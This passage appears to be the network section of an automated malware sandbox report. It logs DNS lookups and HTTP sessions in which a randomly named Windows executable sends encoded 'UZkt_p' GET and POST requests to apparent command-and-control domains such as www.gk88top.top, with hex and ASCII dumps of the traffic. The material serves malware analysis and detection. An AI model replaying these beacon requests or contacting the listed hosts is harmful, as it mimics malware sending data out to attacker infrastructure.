                                                    Dec 13, 2024 13:08:20.838345051 CET804996166.29.149.46192.168.2.7
                                                    Dec 13, 2024 13:08:26.434437990 CET4997880192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:26.554311991 CET8049978217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:26.554409027 CET4997880192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:26.568495035 CET4997880192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:26.688291073 CET8049978217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:27.793652058 CET8049978217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:27.793677092 CET8049978217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:27.793768883 CET4997880192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:28.082812071 CET4997880192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:29.095309019 CET4998580192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:29.215143919 CET8049985217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:29.215290070 CET4998580192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:29.229239941 CET4998580192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:29.350004911 CET8049985217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:30.458702087 CET8049985217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:30.458834887 CET8049985217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:30.458874941 CET4998580192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:30.733081102 CET4998580192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:32.333926916 CET4998980192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:32.454036951 CET8049989217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:32.454140902 CET4998980192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:32.466933012 CET4998980192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:32.586833000 CET8049989217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:32.586901903 CET8049989217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:33.827815056 CET8049989217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:33.827867985 CET8049989217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:33.827965975 CET4998980192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:33.982942104 CET4998980192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:35.002242088 CET4999080192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:35.122323036 CET8049990217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:35.123075962 CET4999080192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:35.131360054 CET4999080192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:35.251203060 CET8049990217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:36.422768116 CET8049990217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:36.422811985 CET8049990217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:36.422833920 CET8049990217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:36.422889948 CET8049990217.70.184.50192.168.2.7
                                                    Dec 13, 2024 13:08:36.422986031 CET4999080192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:36.422986031 CET4999080192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:36.426814079 CET4999080192.168.2.7217.70.184.50
                                                    Dec 13, 2024 13:08:36.546581984 CET8049990217.70.184.50192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 13:07:21.055763006 CET | 59843 | 53 | 192.168.2.7 | 1.1.1.1
Dec 13, 2024 13:07:21.599163055 CET | 53 | 59843 | 1.1.1.1 | 192.168.2.7
Dec 13, 2024 13:07:38.320802927 CET | 63116 | 53 | 192.168.2.7 | 1.1.1.1
Dec 13, 2024 13:07:38.652786970 CET | 53 | 63116 | 1.1.1.1 | 192.168.2.7
Dec 13, 2024 13:07:54.367074966 CET | 60844 | 53 | 192.168.2.7 | 1.1.1.1
Dec 13, 2024 13:07:55.373620033 CET | 60844 | 53 | 192.168.2.7 | 1.1.1.1
Dec 13, 2024 13:07:55.978214025 CET | 53 | 60844 | 1.1.1.1 | 192.168.2.7
Dec 13, 2024 13:07:55.978249073 CET | 53 | 60844 | 1.1.1.1 | 192.168.2.7
Dec 13, 2024 13:08:10.642019987 CET | 58557 | 53 | 192.168.2.7 | 1.1.1.1
Dec 13, 2024 13:08:11.352205992 CET | 53 | 58557 | 1.1.1.1 | 192.168.2.7
Dec 13, 2024 13:08:25.736351013 CET | 59675 | 53 | 192.168.2.7 | 1.1.1.1
Dec 13, 2024 13:08:26.431775093 CET | 53 | 59675 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 13, 2024 13:07:21.055763006 CET | 192.168.2.7 | 1.1.1.1 | 0x250f | Standard query (0) | www.qqa79.top | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:07:38.320802927 CET | 192.168.2.7 | 1.1.1.1 | 0xff97 | Standard query (0) | www.gk88top.top | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:07:54.367074966 CET | 192.168.2.7 | 1.1.1.1 | 0xf275 | Standard query (0) | www.127358.win | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:07:55.373620033 CET | 192.168.2.7 | 1.1.1.1 | 0xf275 | Standard query (0) | www.127358.win | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:08:10.642019987 CET | 192.168.2.7 | 1.1.1.1 | 0x84 | Standard query (0) | www.infohive.website | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:08:25.736351013 CET | 192.168.2.7 | 1.1.1.1 | 0x1400 | Standard query (0) | www.sunnyz.store | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 13, 2024 13:07:21.599163055 CET | 1.1.1.1 | 192.168.2.7 | 0x250f | No error (0) | www.qqa79.top | qqa79.top | | CNAME (Canonical name) | IN (0x0001) | false
Dec 13, 2024 13:07:21.599163055 CET | 1.1.1.1 | 192.168.2.7 | 0x250f | No error (0) | qqa79.top | | 38.47.233.21 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:07:38.652786970 CET | 1.1.1.1 | 192.168.2.7 | 0xff97 | No error (0) | www.gk88top.top | | 172.67.137.47 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:07:38.652786970 CET | 1.1.1.1 | 192.168.2.7 | 0xff97 | No error (0) | www.gk88top.top | | 104.21.7.187 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:07:55.978214025 CET | 1.1.1.1 | 192.168.2.7 | 0xf275 | No error (0) | www.127358.win | | 206.238.89.119 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:07:55.978249073 CET | 1.1.1.1 | 192.168.2.7 | 0xf275 | No error (0) | www.127358.win | | 206.238.89.119 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:08:11.352205992 CET | 1.1.1.1 | 192.168.2.7 | 0x84 | No error (0) | www.infohive.website | | 66.29.149.46 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:08:26.431775093 CET | 1.1.1.1 | 192.168.2.7 | 0x1400 | No error (0) | www.sunnyz.store | webredir.vip.gandi.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 13, 2024 13:08:26.431775093 CET | 1.1.1.1 | 192.168.2.7 | 0x1400 | No error (0) | webredir.vip.gandi.net | | 217.70.184.50 | A (IP address) | IN (0x0001) | false
                                                    • www.qqa79.top
                                                    • www.gk88top.top
                                                    • www.127358.win
                                                    • www.infohive.website
                                                    • www.sunnyz.store
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49822 | 38.47.233.21 | 80 | 6896 | C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:07:21.733755112 CET | 596 | OUT | GET /t67p/?UZkt_p=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXK5swGMfjJNS9OKmwWbAAHFg65wmu/s0j5u+YMxZCZuR1sUVf7BfBaxXx&Er=qt9d5V HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.qqa79.top
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Dec 13, 2024 13:07:23.265644073 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Fri, 13 Dec 2024 12:07:22 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49858 | 172.67.137.47 | 80 | 6896 | C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:07:38.787792921 CET | 862 | OUT | POST /vjnn/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.gk88top.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 219
                                                    Cache-Control: no-cache
                                                    Origin: http://www.gk88top.top
                                                    Referer: http://www.gk88top.top/vjnn/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 50 79 73 6d 45 4a 79 38 36 66 66 4e 4d 41 42 63 37 55 32 59 39 39 76 39 62 72 38 52 57 46 44 52 2f 5a 5a 39 4f 42 4e 6f 78 76 64 57 77 34 6f 73 33 72 37 4f 78 79 35 61 63 55 42 39 77 63 47 2f 41 73 4b 32 44 39 38 76 33 56 68 39 2b 42 52 52 6d 73 50 4b 46 68 55 56 7a 62 6d 30 41 59 4b 72 77 39 4f 62 31 4a 78 34 76 2b 4e 51 56 36 42 4f 56 6d 75 36 55 62 41 67 54 4e 6f 51 4c 70 63 58 37 77 36 44 70 6b 39 43 70 4b 67 71 49 74 53 35 67 4c 50 65 75 72 5a 38 42 43 56 53 55 75 6a 67 36 65 6c 6e 43 69 71 55 6f 45 33 77 2f 4b 2f 56 31 77 73 54 4c 6f 6c 74 77 56 45 78 48 72 4d 51 47 50 54 70 4e 51 3d 3d
                                                    Data Ascii: UZkt_p=y/nbf6lCzqeuPysmEJy86ffNMABc7U2Y99v9br8RWFDR/ZZ9OBNoxvdWw4os3r7Oxy5acUB9wcG/AsK2D98v3Vh9+BRRmsPKFhUVzbm0AYKrw9Ob1Jx4v+NQV6BOVmu6UbAgTNoQLpcX7w6Dpk9CpKgqItS5gLPeurZ8BCVSUujg6elnCiqUoE3w/K/V1wsTLoltwVExHrMQGPTpNQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49868 | 172.67.137.47 | 80 | 6896 | C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:07:41.447828054 CET | 882 | OUT | POST /vjnn/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.gk88top.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 239
                                                    Cache-Control: no-cache
                                                    Origin: http://www.gk88top.top
                                                    Referer: http://www.gk88top.top/vjnn/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 4a 53 63 6d 58 2b 6d 38 2f 2f 66 4f 44 67 42 63 75 6b 32 55 39 39 72 39 62 71 35 4f 57 78 76 52 2f 35 70 39 4e 45 74 6f 77 76 64 57 6c 49 6f 70 70 62 37 5a 78 79 30 76 63 57 56 39 77 63 53 2f 41 70 32 32 44 4d 38 73 32 46 68 37 67 68 52 54 72 4d 50 4b 46 68 55 56 7a 62 62 68 41 5a 69 72 77 75 47 62 30 72 4a 6e 69 65 4e 54 43 4b 42 4f 52 6d 75 32 55 62 42 33 54 50 4e 33 4c 72 30 58 37 78 71 44 75 33 6c 42 6e 36 67 6b 4c 64 53 79 75 35 2b 49 30 4c 39 7a 59 68 42 4e 56 5a 37 33 2f 6f 6b 46 59 41 6d 34 32 56 50 4c 37 49 62 6a 69 57 78 6d 4a 70 68 31 39 33 77 51 59 63 70 36 4c 64 79 74 62 67 79 30 41 47 2b 78 74 2f 4c 65 70 44 4c 36 76 46 4e 76 2b 64 41 3d
                                                    Data Ascii: UZkt_p=y/nbf6lCzqeuJScmX+m8//fODgBcuk2U99r9bq5OWxvR/5p9NEtowvdWlIoppb7Zxy0vcWV9wcS/Ap22DM8s2Fh7ghRTrMPKFhUVzbbhAZirwuGb0rJnieNTCKBORmu2UbB3TPN3Lr0X7xqDu3lBn6gkLdSyu5+I0L9zYhBNVZ73/okFYAm42VPL7IbjiWxmJph193wQYcp6Ldytbgy0AG+xt/LepDL6vFNv+dA=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49874 | 172.67.137.47 | 80 | 6896 | C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:07:44.101985931 CET | 1895 | OUT | POST /vjnn/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.gk88top.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 1251
                                                    Cache-Control: no-cache
                                                    Origin: http://www.gk88top.top
                                                    Referer: http://www.gk88top.top/vjnn/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 4a 53 63 6d 58 2b 6d 38 2f 2f 66 4f 44 67 42 63 75 6b 32 55 39 39 72 39 62 71 35 4f 57 78 6e 52 2f 71 52 39 4f 69 6c 6f 69 2f 64 57 35 59 6f 53 70 62 37 59 78 78 45 72 63 57 5a 48 77 66 71 2f 41 4c 4f 32 42 35 63 73 38 46 68 37 6f 42 52 51 6d 73 50 6c 46 68 45 4a 7a 61 33 68 41 5a 69 72 77 75 71 62 39 5a 78 6e 78 4f 4e 51 56 36 42 61 56 6d 75 53 55 62 5a 6e 54 50 5a 4e 4c 61 55 58 38 52 61 44 72 45 42 42 6c 61 68 43 4f 64 54 79 75 35 7a 57 30 4c 67 43 59 69 64 7a 56 65 66 33 2b 4e 30 47 41 30 53 50 69 6c 48 73 78 62 37 76 71 33 42 31 41 76 31 72 37 67 41 75 47 39 6f 62 54 4f 57 77 58 31 76 47 58 67 79 54 74 65 4b 4c 74 32 43 50 7a 48 4a 59 36 62 45 45 61 2f 49 65 43 76 78 69 61 31 59 55 46 45 4a 70 45 64 6c 4c 59 4f 6e 36 47 36 30 59 4c 76 68 54 76 33 56 61 75 67 62 55 46 6e 6d 50 67 70 6d 66 53 55 47 2b 41 61 41 69 79 58 7a 63 54 4c 34 63 73 6a 54 44 31 46 50 4c 32 32 6c 4b 77 55 37 43 6c 48 73 58 43 45 58 32 42 31 68 47 4a 35 64 77 67 46 57 [TRUNCATED]
Data Ascii: UZkt_p= [TRUNCATED]
Dec 13, 2024 13:07:45.726150036 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Fri, 13 Dec 2024 12:07:45 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uMcLC2ORiWh7piRBirqeAFWQkZ8SryRH366t50yY%2FP7Wpk1QZ%2BVre4YDwPv7cKODQaGo%2Fz3%2FpbjqYgWeV%2FqLYEYxJf89XDYTKlK6kUU2tn5V3OU%2BVcqsv7aOfDRPaZ5IRbw%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f15d5ea5cd078e7-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2069&min_rtt=2069&rtt_var=1034&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1895&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 [TRUNCATED]
                                                    Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZb
Dec 13, 2024 13:07:45.726161003 CET | 87 | IN | Data Raw: a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00
                                                    Data Ascii: N`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49880 | 172.67.137.47 | 80 | 6896 | C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:07:46.753331900 CET | 598 | OUT | GET /vjnn/?UZkt_p=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH2FtKgHUwtP7LZToi+NLiM5u8oda1xOl7pN9QCYN1UR2qYINqcP5uKuM1&Er=qt9d5V HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.gk88top.top
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Dec 13, 2024 13:07:48.401653051 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Fri, 13 Dec 2024 12:07:48 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WKX7hwH%2Bi7ENN2Ve0ygdeHII8eWoAJUMwCztan0yCoA%2FLuRq%2B3R6Fd6fBi6h7daqxMQyNd2oTgMpdluwO36L129AOpXwT5Sg4%2BffglqRaLlbeeDYD3wmpB7xu8FhLnZt%2Bn8%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f15d5faffc58c47-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1998&rtt_var=999&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=598&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 34 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 [TRUNCATED]
                                                    Data Ascii: 448<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%
Dec 13, 2024 13:07:48.401822090 CET | 662 | IN | Data Raw: 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31
                                                    Data Ascii: ;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;
Dec 13, 2024 13:07:48.942686081 CET | 1236 | IN | Data Raw: 37 66 66 61 0d 0a 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41 45 44 43 41 59 41 41 41 43
                                                    Data Ascii: 7ffa<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJQFURFRQEb
